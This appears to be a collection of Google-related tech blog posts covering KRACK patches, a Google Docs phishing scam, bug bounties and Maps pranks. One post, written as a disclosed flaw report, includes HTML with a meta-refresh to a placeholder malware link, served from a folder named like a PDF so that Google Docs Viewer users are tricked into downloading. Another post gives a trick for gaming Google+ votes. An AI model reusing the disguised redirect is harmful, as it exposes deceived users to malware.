Google Patches KRACK Vulnerability in Android



Last month I wrote about how researchers broke wifi's most popular encryption leaving millions of devices prone to KRACK attack. KRACK is a serious flaw as it affects WPA2 protocol.


But I have a good news today . Tech Giant Google has published this month's Android security bulletin, and the company provided a fix for the KRACK vulnerability that came to light last month.

The Android Security Bulletin for November 2017 is split as three separate packages — 2017-11-01, 2017-11-05, and 2017-11-06. The KRACK fixes are included in the latter — 2017-11-06.

If your phone receives the update and the security patch level is 2017-11-06, the KRACK fixes are also included.

It is to note that Microsoft, which silently deployed KRACK fixes to Windows users without telling anyone, a month before the vulnerability became public.Apple released KRACK patches at the end of October, as part of iOS 11.1 & macOS High Sierra 10.13.1.

Google is infact the last major vendor to release the fix for KRACK Vulnerability. 

Details About The Attack


The bug, known as "KRACK" for Key Reinstallation Attack, exposes a fundamental flaw in WPA2, a common protocol used in securing most modern wireless networks. Mathy Vanhoef, a computer security academic, who found the flaw, said the weakness lies in the protocol's four-way handshake, which securely allows new devices with a pre-shared password to join the network.

That weakness can, at its worst, allow an attacker to decrypt network traffic from a WPA2-enabled device, hijack connections, and inject content into the traffic stream.

In other words: hackers can eavesdrop on your network traffic.

Beware of the big Google Docs scam - How to protect yourself



Did someone share  a google docs with you ? If yes then you may well be one of the millions of internet users who became a victim of this scam campaign.

In the last few days a lot of people are getting emails from people they know with a regular invitation to view a Google document  which says that the person [sender] "has shared a document on Google Docs with you."  It might even appear to have been sent from one of your known friends, family members, or colleagues – lulling you into a false sense of security.



Once you clicked the link, you will be redirected to a page which says, "Google Docs would like to read, send and delete emails, as well access to your contacts," asking your permission to "allow" access.

Now here is the catch. It’s a fake app that is named Google Docs, but it’s actually a guy named Eugene Pupov trying to trick you. Click the blue “Google Docs” link to get more info on the app:

Since the app will allow access to “manage your contacts” and “read, send, delete, and manage email”, it gives the attacker full access to your Inbox. It also allows the attacker to propagate the scam by sending the same email to all of your contacts.

In short, anything linked to a compromised Gmail account is potentially at risk and even if you enabled two factor authentication, it would not prevent hackers to access your data.

What to do if you've already fallen victim

If you have fallen victim of this scam then you need to remove permissions given to the app. 

 

  • Go to your Gmail accounts permissions settings at https://myaccount.google.com and Sign-in.
  • Go to Security and Connected Apps.
  • Search for "Google Docs" from the list of connected apps and Remove it. It's not the real Google Docs  




Spreading malicious softwares via google document viewer



Google document or Google Docs is an awesome word processor offered by Google within its Google Drive service. The suite allows users to create and edit documents online while collaborating with other users in real-time. The best thing is that it serves as a collaborative tool for editing documents in real time. Documents can be shared, opened, and edited by multiple users simultaneously and users are able to see character-by-character changes as other collaborators make edits.

Earlier Google had a page that allowed users to quickly view documents online right from your browser. The Google Docs Viewer page was available at docs.google.com/viewer and drive.google.com/viewer. one could enter a document URL and Google generated a link to view it. This worked for a lot of file types: Microsoft Office files, PDFs, PostScript files and more.

 This feature is no longer available. The URL shows a 404 error. While the page is no longer available one can still use the Google Docs Viewer by pasting URL here

https://docs.google.com/viewer?url=[URL to pdf file]

For example

https://docs.google.com/viewer?url=https://bitcoin.org/bitcoin.pdf


The Flaw

I wondered what would happen if i give the URL of a website ( say a malicious one ). for testing i gave the url of my site. and to my surprise it showed a 500 error.

https://docs.google.com/viewer?url=http://www.hackatrick.com


Next i entered a link of a .gif image to see if it get opened or not. But i got a No preview error.


I also tried to enter a link of a website with an open redirect flaw. I wanted to see if it redirect to the site. but it ended up showing the html source code of the redirect page.


I realized that we cannot use open redirect here because if we use open redirect and try to redirect user then it shows the html source code of the redirect page. the link shows the html source code if the url ends with an .html extension and shows pdf files if the url ends with a .pdf extension and shows 500 error if we enter a domain name.

My goal was to redirect user to a site using google document . So I started thinking of an alternative way.

I created a directory in my website and named it as demo1.pdf . Inside the directory i created a html file and named it as index.html and added the folloing codes in it

 <html>
<head>
<title>A web page that points a browser to a different page after 2 seconds</title>
<meta http-equiv="refresh" content="0; URL=[link to malicious software]">
<meta name="keywords" content="automatic redirection">
</head>
<body>
test
manually.
</body>
</html>
This code redirects the index.html to a different site after a specific amount of time.

Now when I entered this url in the google document viewer site, google thought it to be a normal pdf file and not html so it did nt show the html source code. and since there was no pdf so it showed a 'no preview' message.



Now if an user gets this link, he will first see the url where it is clearly written as .pdf . next he will wonder if its a pdf file then why its not getting opened in the viewer ? and the third thing he will notice is the 3rd party apps suggested by google to open the pdf. the user willl have no clue that its not actually a pdf file. So if the user clicks on the view original button which is on the top of the viewer page, the user will land in the /demo1.pdf directory which have the html file which redirects to malicious software link.

In firefox it will show a popup with a save option and in chrome it will automatically start downloading.

In firebox browser it shows a popup with a save file option

 

In firefox











In chrome it automatically starts downloading

In chrome

I have reported the flaw to google security team but unfortunately this flaw does not come under their bug bounty program as they don't consider it to be a valid vulnerability, but it does not matter as the fun and the learning is more important. Google thanked me for informing them about the issue and they will fix it soon. Hopefully !!

Google Play store paid Applications now from 10 (INR)




Apple leads, Google follows—much to the delight of Indian mobile application developers and users.

First, Apple made mobile applications available for as low as INR 10. Now, Google has done the same: Google Play apps are now available for INR 10 (earlier the minimum price was INR 50).

Why Google has slashed the minimum price?


Google actually didn’t have a choice. It could either join Apple or risk getting left behind in the Indian mobile application market.

A few weeks back, Apple introduced a multitier price system for its Indian Apps store. One of the highlight was the minimum price tag on the applications. Developers could now price their applications at INR 10.

Taking the cue from its Cupertino-based counterpart, Google also decided to reduce the minimum price. While earlier a user had to shell a minimum of INR 50 to enjoy a paid application in Google Play store, now he could access it for only INR 10.

The reason why Apple, and now Google, has lowered the price is actually pretty simple. India is a big country with a big population, and with a good part of the population following in the age bracket that uses the mobile applications most, the potential in the mobile app niche is stupendous. As most, if not all, Indian buyers are price conscious, both these giants are hoping to exponentially increase the number of downloads by lowering the minimum price (and this is by no means an unrealistic estimation).

What does the news means for developers and gamers?

Earlier developers listing applications in Google Play India had two options :

  • To provide their applications for free and charge through in-application purchases
  • To list a price of INR 50 or more on their applications, even after knowing that many users will not easily    part with that kind of money to buy their games

However, now developers can price their apps for INR 10, an amount which most gamers will not find high. So, basically the price slash will help developers to reach out to more people. It also makes testing new applications easier. First-time developers too will now find it easier to enter the mobile application market.
Gamers, on the other hand, can now enjoy their favorite games without worrying too much about the price factor. 

What else is Google doing to entice more users?

Google realizes Indian audience is unique. That’s why it has recently started selling Google Play Prepaid Vouchers (also known as Google Play Gift Cards).

Something like this won’t have much impact in most countries, at least not in the developed countries. However, in India, where a substantial number of people are still not comfortable in making electronic payments, this is a good move.

Google Play Prepaid Vouchers, available in different denominations, can be bought online as well as offline. With these vouchers, just like the price slash, Google plans to attract more customers to its fold.

Both these strategies will make an impact in immediate future is pretty clear. The only question is how much.


About The Author 

Vaishnavi Agrawal loves pursuing excellence through writing and have a passion for technology. She has successfully managed and run personal technology magazines and websites. She currently writes for intellipaat.com a global training company that provides e-learning and professional certification training.

 


Google Launches Bug Bounty Program For Android




Google, the tech giant who always reward security researchers for finding flaws in their services announced the launch of a security rewards program for Android at Black Hat’s Mobile Security Summit in London. But as of now The Android program will only cover vulnerabilities that affect Nexus phone and tablets available for sale in the Google Play Store, though. Right now, that’s the Nexus 6 phone and Nexus 9 tablet.

Rewards start at $500 for reporting moderately severe vulnerabilities and go up to $8,000 for researchers who report a critical bug, provide a test case and submit a patch. On top of that, Google will offer up to an additional $30,000 for exploits that can compromise TrustZone or Verified Boot (and slightly smaller rewards up to $10,000 and $20,000 for attacks from installed apps and remote or proximal attacks).

With the launch of the Android Security Rewards Program, Google aims to encourage the work of security researchers in making Android more secure. If you are a hacker or a security researcher and  If you're looking to join the hunt, you can browse all the detailed info right here.

What do you think about this reward initiative by Google? Are the efforts enough to help make Android more “secure”? Let us know your thoughts in the comments below!

Get Unlimited Google Plus Votes to your Blog Posts for Free

Get Unlimited Google Plus Votes to your Blog Posts for Free


After so many updates and changes made by Google in their SERP ranking system, it has become hard for bloggers and other professionals to get a good rank in Google and get good traffic. In order to get a good rank by Google, you not only have to write a good article but also maintain a good social strength of it.

Whenever we write an article on our website, we usually share it on all of our social profiles to get likes, shares and upvotes etc. But sharing does not guarantee that we will get a good response from people. In this post I will share a trick by which one can get Unlimited Google Plus Votes to your Blog Posts for Free.

Before learning about the trick first add a social sharing widget to you blog. There are many free widgets like Sharethis and Addthis which you can add to your blog.

 Get Unlimited Google Plus Votes to your Blog Posts for Free

Google + is a part of Google so Google consider it higher than any other social networking sites like Facebook , twitter etc So in order to get good social strength one must get good response from Google+

Here are the steps to get Unlimited  Google Plus Votes to your Blog Posts

The trick is very simple and does not require much time too. And it does not require any software or any complex method

Get Google+ votes

The first step is to get Google+ votes, and in order to do so join Communities. There are lots of popular communities in Google+ with huge number of members. Join them all

Join almost 20-30 Communities and also join a few commenuties which is related to your Blogging Niche.


The Main Trick

  • Now after joining Google+ communities, here is the main trick to get Unlimited Google Plus Votes to your Blog Posts.

  • Go to google images and download few images related to technology, Famous quotes, Funny pics etc.

Get unlimited google+ votes for free



  • Now Go to the communities that you joined and upload any of the images that you have downloaded. And in the post section put the link of your blog post. And share it. Do the same in All the communities.



Now you will start getting a good number of Google+ votes in your blog post. What exactly happens is that each time someone in the community votes for your post, automatically you get vote for your blog post too.






Google Maps abused again, Searching the N-Word Produces White House


Google maps shows white house as N***** House


Last month a small patch of terrain in Google Maps just south of the Pakistani city of Rawalpindi has been found to contain a bizarre image of the Android robot urinating on the Apple logo.



The image seems to have been user generated through the Map Maker function, which allows users to contribute local knowledge to Google Maps. In this case, that meant the suspiciously shaped pattern of grass appeared in Maps without Google realizing the meaning behind it. "We’re sorry for this inappropriate user-created content," Google said in a statement to The Washington Post. "We’re working to remove it quickly."





After this embarrassing oversights Google has shut down its Map Maker service. The company said it had been moderating all user-generated edits to try to prevent such pranks, but found it impossible to keep up.

But it seems that even after Google removed the map marker service, someone still managed to play yet another prank on Google maps and this time they abused the Add Place feature. Someone has added ' N****s House ' in White House of United states. Whenever an user types 'N****s House' in the google maps search box it shows White House. At the time of writing it was still  surprisingly live.




Google should take steps to fix it soon and come up with an effective solution to prevent such pranks in the future.

Android M to include more privacy controls for users



Privacy has been a great issue among Android users. According to Bloomberg, Google is reportedly looking to give users more granular control over app permissions.

According to Bloomberg the new operating system, set to debut at Google I/O 2015, will let users pick and choose what information is shared with certain applications, including photos, contacts, and location. This is an evolution in Google's walk to bring more privacy and peace of mind to its users. That means you’ll be able to set if an app—Facebook, for example—can access information such as photos, contacts and location.

It’s unclear how the new features will affect the functionality of an app, because few permissions are necessary for some apps and if those permissions are not granted, apps might not work the way they suppose to work. This new option  will presumably cause some strife among Google and developers, who feed off that information.


We’re expecting to hear more about Android M at Google I/O, which kicks off on May 28.

Google sets up People Finder for Nepal earthquake 2015

Google sets up People Finder for Nepal earthquake 2015
The devastating earthquake that struck Nepal earlier today has left around 600 people dead and many more injured. But the worst part is that there are a lot of people who are still missing.

So Google has updated its Google Person Finder to help out with rescue operations.




Wikipedia states that GPF provides a registry and message board for survivors, family, and loved ones affected by a natural disaster to post and search for information about each other's status and whereabouts. It was created by volunteer Google engineers in response to the 2010 Haiti earthquake.

GPF has two features:


1. It helps you search for missing people.

 



 

And in case you have any relevant information about someone, there is a feature that helps you update their status and location.

 

 In case you're looking for a missing person, you too can avail the help of Google Person Finder.

Source : scoopwhoop.com